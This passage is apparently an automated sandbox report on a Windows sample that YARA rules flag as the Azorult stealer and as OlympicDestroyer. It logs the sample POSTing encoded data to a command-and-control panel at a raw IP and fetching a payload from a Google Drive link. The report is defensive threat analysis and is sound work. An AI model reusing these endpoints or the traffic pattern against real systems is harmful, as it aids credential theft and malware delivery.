                    Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4f ed 3e 33 ed 3e 3c ed 3e 3d ed 3e 3a ed 3e 3b 8a 28 38 8c 28 39 f1 28 39 fb 28 39 fa 28 39 ff 4f 2f fb 3c 2f fb 38 2f fb 34 4b
                    Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KO>3><>=>:>;(8(9(9(9(9O/</8/4K
                  Source: global traffic HTTP traffic detected:
                    POST /rothchildnew/Panel/index.php HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                    Host: 185.29.11.112
                    Content-Length: 73426
                    Cache-Control: no-cache
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
                  Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
                  Source: 1COK25f1vT.exe, 0000000C.00000002.514050041.000000001E780000.00000004.00000001.sdmp String found in binary or memory: http://185.29.11.112/rothchildnew/Panel/index.php
                  Source: 1COK25f1vT.exe, 0000000C.00000002.514050041.000000001E780000.00000004.00000001.sdmp String found in binary or memory: http://185.29.11.112/rothchildnew/Panel/index.phpx
                  Source: 1COK25f1vT.exe, 1COK25f1vT.exe, 0000000C.00000002.510992835.0000000000401000.00000020.00020000.sdmp String found in binary or memory: http://ip-api.com/json
                  Source: mozglue.dll.12.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: 1COK25f1vT.exe, 1COK25f1vT.exe, 0000000C.00000002.510992835.0000000000401000.00000020.00020000.sdmp String found in binary or memory: https://dotbit.me/a/
                  Source: 1COK25f1vT.exe, 0000000C.00000002.511282880.0000000002150000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM-
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html
                  Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknown HTTP traffic detected: POST /rothchildnew/Panel/index.php HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                      Host: 185.29.11.112
                      Content-Length: 107
                      Cache-Control: no-cache
                      Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4f ed 3e 33 ed 3e 3c ed 3e 3d ed 3e 3a ed 3e 3b 8a 28 38 8c 28 39 f1 28 39 fb 28 39 fa 28 39 ff 4f 2f fb 3c 2f fb 38 2f fb 34 4b
                      Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KO>3><>=>:>;(8(9(9(9(9O/</8/4K
                  Source: unknown DNS traffic detected: queries for: drive.google.com
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00417D84 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HttpOpenRequestA,HttpSendRequestA,GetMessageA,InternetReadFile,12_2_00417D84
                  Source: global traffic HTTP traffic detected: GET /uc?export=download&id=17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM- HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: drive.google.com
                      Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7bnkiq90sqb2f9a5rfbavvv8a7avoa21/1639944750000/11699732749327025486/*/17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM-?e=download HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Cache-Control: no-cache
                      Host: doc-0o-b4-docs.googleusercontent.com
                      Connection: Keep-Alive
                  Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49786 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49787 version: TLS 1.2

                  System Summary:

                  Potential malicious icon found
                  Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
                  Malicious sample detected (through community Yara rule)
                  Source: 12.2.1COK25f1vT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
                  Source: 12.2.1COK25f1vT.exe.2004391e.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
                  Source: 12.2.1COK25f1vT.exe.1ffd81cd.7.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
                  Source: 12.2.1COK25f1vT.exe.1ffb61e0.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
                  Source: 1COK25f1vT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  Source: 12.2.1COK25f1vT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                  Source: 12.2.1COK25f1vT.exe.2004391e.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: 12.2.1COK25f1vT.exe.1ffd81cd.7.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: 12.2.1COK25f1vT.exe.1ffb61e0.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload